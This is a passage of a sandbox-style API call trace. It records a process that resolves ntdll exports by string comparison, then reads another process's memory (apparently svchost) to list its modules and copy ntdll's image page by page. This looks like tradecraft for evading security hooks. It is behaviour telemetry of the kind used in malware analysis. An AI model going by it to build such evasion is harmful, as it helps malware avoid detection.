(lpString1="AlpcMaxAllowedMessageLength", lpString2="LdrGetProcedureAddress") returned -1 [0141.161] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="LdrGetProcedureAddress") returned -1 [0141.161] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="LdrGetProcedureAddress") returned -1 [0141.162] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="LdrGetProcedureAddress") returned -1 [0141.162] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="LdrGetProcedureAddress") returned -1 [0141.162] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="LdrGetProcedureAddress") returned -1 [0141.162] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="LdrGetProcedureAddress") returned -1 [0141.162] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="LdrGetProcedureAddress") returned -1 [0141.162] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="LdrGetProcedureAddress") returned -1 [0141.162] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="LdrGetProcedureAddress") returned -1 [0141.162] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="LdrGetProcedureAddress") returned -1 [0141.162] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="LdrGetProcedureAddress") returned -1 [0141.162] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="LdrGetProcedureAddress") returned -1 [0141.162] lstrcmpA (lpString1="CsrClientCallServer", lpString2="LdrGetProcedureAddress") returned -1 [0141.162] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="LdrGetProcedureAddress") returned -1 [0141.162] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="LdrGetProcedureAddress") returned -1 [0141.162] lstrcmpA (lpString1="CsrGetProcessId", lpString2="LdrGetProcedureAddress") returned -1 [0141.163] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="LdrGetProcedureAddress") returned -1 [0141.163] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="LdrGetProcedureAddress") returned -1 [0141.163] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="LdrGetProcedureAddress") returned -1 [0141.163] lstrcmpA (lpString1="DbgBreakPoint", lpString2="LdrGetProcedureAddress") returned -1 [0141.163] lstrcmpA (lpString1="DbgPrint", lpString2="LdrGetProcedureAddress") returned -1 [0141.163] lstrcmpA (lpString1="DbgPrintEx", lpString2="LdrGetProcedureAddress") returned -1 [0141.163] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="LdrGetProcedureAddress") returned -1 [0141.163] lstrcmpA (lpString1="DbgPrompt", lpString2="LdrGetProcedureAddress") returned -1 [0141.163] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="LdrGetProcedureAddress") returned -1 [0141.163] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="LdrGetProcedureAddress") returned -1 [0141.163] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="LdrGetProcedureAddress") returned -1 [0141.163] lstrcmpA (lpString1="DbgUiContinue", lpString2="LdrGetProcedureAddress") returned -1 [0141.163] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="LdrGetProcedureAddress") returned -1 [0141.163] lstrcmpA (lpString1="DbgUiConvertStateChangeStructureEx", lpString2="LdrGetProcedureAddress") returned -1 [0141.163] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="LdrGetProcedureAddress") returned -1 [0141.163] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="LdrGetProcedureAddress") returned -1 [0141.164] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="LdrGetProcedureAddress") returned -1 [0141.164] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="LdrGetProcedureAddress") returned -1 [0141.164] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="LdrGetProcedureAddress") returned -1 [0141.164] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="LdrGetProcedureAddress") returned -1 [0141.164] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="LdrGetProcedureAddress") returned -1 [0141.164] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="LdrGetProcedureAddress") returned -1 [0141.164] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="LdrGetProcedureAddress") returned -1 [0141.164] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="LdrGetProcedureAddress") returned -1 [0141.164] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="LdrGetProcedureAddress") returned -1 [0141.164] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="LdrGetProcedureAddress") returned -1 [0141.164] lstrcmpA (lpString1="EtwEventEnabled", lpString2="LdrGetProcedureAddress") returned -1 [0141.164] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="LdrGetProcedureAddress") returned -1 [0141.164] lstrcmpA (lpString1="EtwEventRegister", lpString2="LdrGetProcedureAddress") returned -1 [0141.164] lstrcmpA (lpString1="EtwEventSetInformation", lpString2="LdrGetProcedureAddress") returned -1 [0141.164] lstrcmpA (lpString1="EtwEventUnregister", lpString2="LdrGetProcedureAddress") returned -1 [0141.164] lstrcmpA (lpString1="EtwEventWrite", lpString2="LdrGetProcedureAddress") returned -1 [0141.164] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="LdrGetProcedureAddress") returned -1 [0141.165] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="LdrGetProcedureAddress") returned -1 [0141.165] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="LdrGetProcedureAddress") returned -1 [0141.165] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="LdrGetProcedureAddress") returned -1 [0141.165] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="LdrGetProcedureAddress") returned -1 [0141.165] lstrcmpA (lpString1="EtwEventWriteString", lpString2="LdrGetProcedureAddress") returned -1 [0141.165] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="LdrGetProcedureAddress") returned -1 [0141.165] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="LdrGetProcedureAddress") returned -1 [0141.165] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="LdrGetProcedureAddress") returned -1 [0141.165] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="LdrGetProcedureAddress") returned -1 [0141.165] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="LdrGetProcedureAddress") returned -1 [0141.165] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="LdrGetProcedureAddress") returned -1 [0141.165] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="LdrGetProcedureAddress") returned -1 [0141.165] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="LdrGetProcedureAddress") returned -1 [0141.165] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="LdrGetProcedureAddress") returned -1 [0141.165] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="LdrGetProcedureAddress") returned -1 [0141.166] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="LdrGetProcedureAddress") returned -1 [0141.166] lstrcmpA (lpString1="EtwReplyNotification", lpString2="LdrGetProcedureAddress") returned -1 [0141.166] lstrcmpA (lpString1="EtwSendNotification", lpString2="LdrGetProcedureAddress") returned -1 [0141.166] lstrcmpA (lpString1="EtwSetMark", lpString2="LdrGetProcedureAddress") returned -1 [0141.166] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="LdrGetProcedureAddress") returned -1 [0141.166] lstrcmpA (lpString1="EtwTraceMessage", lpString2="LdrGetProcedureAddress") returned -1 [0141.166] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="LdrGetProcedureAddress") returned -1 [0141.166] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="LdrGetProcedureAddress") returned -1 [0141.166] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="LdrGetProcedureAddress") returned -1 [0141.166] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="LdrGetProcedureAddress") returned -1 [0141.166] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="LdrGetProcedureAddress") returned -1 [0141.166] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="LdrGetProcedureAddress") returned -1 [0141.166] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="LdrGetProcedureAddress") returned -1 [0141.166] lstrcmpA (lpString1="ExpInterlockedPopEntrySListEnd", lpString2="LdrGetProcedureAddress") returned -1 [0141.166] lstrcmpA (lpString1="ExpInterlockedPopEntrySListFault", lpString2="LdrGetProcedureAddress") returned -1 [0141.166] lstrcmpA (lpString1="ExpInterlockedPopEntrySListResume", lpString2="LdrGetProcedureAddress") returned -1 [0141.166] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="LdrGetProcedureAddress") returned -1 [0141.166] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="LdrGetProcedureAddress") returned -1 [0141.167] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="LdrGetProcedureAddress") returned -1 [0141.167] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="LdrGetProcedureAddress") returned -1 [0141.167] lstrcmpA (lpString1="KiUserInvertedFunctionTable", lpString2="LdrGetProcedureAddress") returned -1 [0141.167] lstrcmpA (lpString1="LdrAccessResource", lpString2="LdrGetProcedureAddress") returned -1 [0141.167] lstrcmpA (lpString1="LdrAddDllDirectory", lpString2="LdrGetProcedureAddress") returned -1 [0141.167] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="LdrGetProcedureAddress") returned -1 [0141.167] lstrcmpA (lpString1="LdrAddRefDll", lpString2="LdrGetProcedureAddress") returned -1 [0141.167] lstrcmpA (lpString1="LdrAppxHandleIntegrityFailure", lpString2="LdrGetProcedureAddress") returned -1 [0141.167] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="LdrGetProcedureAddress") returned -1 [0141.167] lstrcmpA (lpString1="LdrEnumResources", lpString2="LdrGetProcedureAddress") returned -1 [0141.167] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="LdrGetProcedureAddress") returned -1 [0141.167] lstrcmpA (lpString1="LdrFastFailInLoaderCallout", lpString2="LdrGetProcedureAddress") returned -1 [0141.167] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="LdrGetProcedureAddress") returned -1 [0141.167] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="LdrGetProcedureAddress") returned -1 [0141.167] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="LdrGetProcedureAddress") returned -1 [0141.167] lstrcmpA (lpString1="LdrFindResource_U", lpString2="LdrGetProcedureAddress") returned -1 [0141.167] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="LdrGetProcedureAddress") returned -1 [0141.167] lstrcmpA (lpString1="LdrGetDllDirectory", lpString2="LdrGetProcedureAddress") returned -1 [0141.167] lstrcmpA (lpString1="LdrGetDllFullName", lpString2="LdrGetProcedureAddress") returned -1 [0141.168] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="LdrGetProcedureAddress") returned -1 [0141.168] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="LdrGetProcedureAddress") returned -1 [0141.168] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="LdrGetProcedureAddress") returned -1 [0141.168] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="LdrGetProcedureAddress") returned -1 [0141.168] lstrcmpA (lpString1="LdrGetDllPath", lpString2="LdrGetProcedureAddress") returned -1 [0141.168] lstrcmpA (lpString1="LdrGetFailureData", lpString2="LdrGetProcedureAddress") returned -1 [0141.168] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="LdrGetProcedureAddress") returned -1 [0141.168] lstrcmpA (lpString1="LdrGetKnownDllSectionHandle", lpString2="LdrGetProcedureAddress") returned -1 [0141.168] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="LdrGetProcedureAddress") returned 0 [0141.168] VirtualFree (lpAddress=0xb30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.233] GetModuleHandleW (lpModuleName="NTDLL.DLL") returned 0x778f0000 [0141.233] GetProcAddress (hModule=0x778f0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77968930 [0141.233] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x174, ProcessInformationClass=0x0, ProcessInformation64=0x19ef8c, ProcessInformationLength=0x30, ReturnLength=0x19efe4 | out: ProcessInformation64=0x19ef8c, ReturnLength=0x19efe4) returned 0x0 [0141.234] LocalAlloc (uFlags=0x0, uBytes=0x200) returned 0x629120 [0141.234] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x61df68 [0141.235] LocalFree (hMem=0x629120) returned 0x0 [0141.235] LocalFree (hMem=0x61df68) returned 0x0 [0141.235] VirtualAlloc (lpAddress=0x0, dwSize=0x7e4, flAllocationType=0x3000, flProtect=0x4) returned 0x5f0000 [0141.235] GetModuleHandleW (lpModuleName="NTDLL.DLL") returned 0x778f0000 [0141.235] GetProcAddress (hModule=0x778f0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77968930 [0141.236] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x174, ProcessInformationClass=0x0, ProcessInformation64=0x19ef8c, ProcessInformationLength=0x30, ReturnLength=0x19efe4 | out: ProcessInformation64=0x19ef8c, ReturnLength=0x19efe4) returned 0x0 [0141.236] LocalAlloc (uFlags=0x0, uBytes=0x200) returned 0x629120 [0141.236] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x61df68 [0141.236] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x25e000, Buffer=0x0, BufferSize=0x61df68, NumberOfBytesRead=0x28 | out: Buffer=0x0, NumberOfBytesRead=0x28) returned 0x0 [0141.236] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28c45200, Buffer=0x7ffb, BufferSize=0x61df90, NumberOfBytesRead=0x40 | out: Buffer=0x7ffb, NumberOfBytesRead=0x40) returned 0x0 [0141.236] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x803460, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0141.236] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x8030c8, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x3e | out: Buffer=0x0, NumberOfBytesRead=0x3e) returned 0x0 [0141.236] StrRChrA (lpStart="C:\\Windows\\system32\\svchost.exe", lpEnd=0x0, wMatch=0x5c) returned="\\svchost.exe" [0141.236] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x8032d0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0141.237] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x8031c0, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x3a | out: Buffer=0x0, NumberOfBytesRead=0x3a) returned 0x0 [0141.237] StrRChrA (lpStart="C:\\Windows\\SYSTEM32\\ntdll.dll", lpEnd=0x0, wMatch=0x5c) returned="\\ntdll.dll" [0141.237] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x803910, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0141.237] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x803aa0, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x40 | out: Buffer=0x0, NumberOfBytesRead=0x40) returned 0x0 [0141.237] StrRChrA (lpStart="C:\\Windows\\system32\\KERNEL32.DLL", lpEnd=0x0, wMatch=0x5c) returned="\\KERNEL32.DLL" [0141.237] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x803e10, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0141.237] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x803fa0, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x44 | out: Buffer=0x0, NumberOfBytesRead=0x44) returned 0x0 [0141.237] StrRChrA (lpStart="C:\\Windows\\system32\\KERNELBASE.dll", lpEnd=0x0, wMatch=0x5c) returned="\\KERNELBASE.dll" [0141.237] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x805270, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0141.238] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x8038a0, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x3e | out: Buffer=0x0, NumberOfBytesRead=0x3e) returned 0x0 [0141.238] StrRChrA (lpStart="C:\\Windows\\system32\\sechost.dll", lpEnd=0x0, wMatch=0x5c) returned="\\sechost.dll" [0141.238] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x805460, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0141.238] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x8055f0, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x3c | out: Buffer=0x0, NumberOfBytesRead=0x3c) returned 0x0 [0141.238] StrRChrA (lpStart="C:\\Windows\\system32\\RPCRT4.dll", lpEnd=0x0, wMatch=0x5c) returned="\\RPCRT4.dll" [0141.238] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x805880, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0141.238] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x805a10, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x40 | out: Buffer=0x0, NumberOfBytesRead=0x40) returned 0x0 [0141.239] StrRChrA (lpStart="C:\\Windows\\SYSTEM32\\ucrtbase.dll", lpEnd=0x0, wMatch=0x5c) returned="\\ucrtbase.dll" [0141.239] LocalFree (hMem=0x629120) returned 0x0 [0141.239] LocalFree (hMem=0x61df68) returned 0x0 [0141.239] lstrcmpiA (lpString1="svchost.exe", lpString2="NTDLL.DLL") returned 1 [0141.239] StrChrA (lpStart="svchost.exe", wMatch=0x2e) returned=".exe" [0141.239] lstrcmpiA (lpString1="svchost", lpString2="NTDLL.DLL") returned 1 [0141.239] lstrcmpiA (lpString1="ntdll.dll", lpString2="NTDLL.DLL") returned 0 [0141.239] VirtualFree (lpAddress=0x5f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.239] VirtualAlloc (lpAddress=0x0, dwSize=0x1c1000, flAllocationType=0x3000, flProtect=0x4) returned 0xb30000 [0141.239] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b00000, Buffer=0x7ffb, BufferSize=0xb30000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.240] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b01000, Buffer=0x7ffb, BufferSize=0xb31000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.240] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b02000, Buffer=0x7ffb, BufferSize=0xb32000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.240] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b03000, Buffer=0x7ffb, BufferSize=0xb33000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.240] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b04000, Buffer=0x7ffb, BufferSize=0xb34000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.241] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b05000, Buffer=0x7ffb, BufferSize=0xb35000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.241] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b06000, Buffer=0x7ffb, BufferSize=0xb36000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.241] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b07000, Buffer=0x7ffb, BufferSize=0xb37000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.242] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b08000, Buffer=0x7ffb, BufferSize=0xb38000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.242] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b09000, Buffer=0x7ffb, BufferSize=0xb39000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.242] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b0a000, Buffer=0x7ffb, BufferSize=0xb3a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.243] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b0b000, Buffer=0x7ffb, BufferSize=0xb3b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.243] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b0c000, Buffer=0x7ffb, BufferSize=0xb3c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.243] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b0d000, Buffer=0x7ffb, BufferSize=0xb3d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.244] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b0e000, Buffer=0x7ffb, BufferSize=0xb3e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.244] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b0f000, Buffer=0x7ffb, BufferSize=0xb3f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.244] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b10000, Buffer=0x7ffb, BufferSize=0xb40000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.245] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b11000, Buffer=0x7ffb, BufferSize=0xb41000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.245] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b12000, Buffer=0x7ffb, BufferSize=0xb42000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.245] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b13000, Buffer=0x7ffb, BufferSize=0xb43000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.246] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b14000, Buffer=0x7ffb, BufferSize=0xb44000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.246] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b15000, Buffer=0x7ffb, BufferSize=0xb45000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.246] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b16000, Buffer=0x7ffb, BufferSize=0xb46000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.247] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b17000, Buffer=0x7ffb, BufferSize=0xb47000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.247] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b18000, Buffer=0x7ffb, BufferSize=0xb48000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.247] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b19000, Buffer=0x7ffb, BufferSize=0xb49000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.247] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b1a000, Buffer=0x7ffb, BufferSize=0xb4a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.251] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b1b000, Buffer=0x7ffb, BufferSize=0xb4b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.252] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b1c000, Buffer=0x7ffb, BufferSize=0xb4c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.252] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b1d000, Buffer=0x7ffb, BufferSize=0xb4d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.252] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b1e000, Buffer=0x7ffb, BufferSize=0xb4e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.252] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b1f000, Buffer=0x7ffb, BufferSize=0xb4f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.253] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b20000, Buffer=0x7ffb, BufferSize=0xb50000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.253] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b21000, Buffer=0x7ffb, BufferSize=0xb51000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.253] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b22000, Buffer=0x7ffb, BufferSize=0xb52000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.254] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b23000, Buffer=0x7ffb, BufferSize=0xb53000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.254] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b24000, Buffer=0x7ffb, BufferSize=0xb54000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.255] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b25000, Buffer=0x7ffb, BufferSize=0xb55000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.255] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b26000, Buffer=0x7ffb, BufferSize=0xb56000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.255] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b27000, Buffer=0x7ffb, BufferSize=0xb57000, 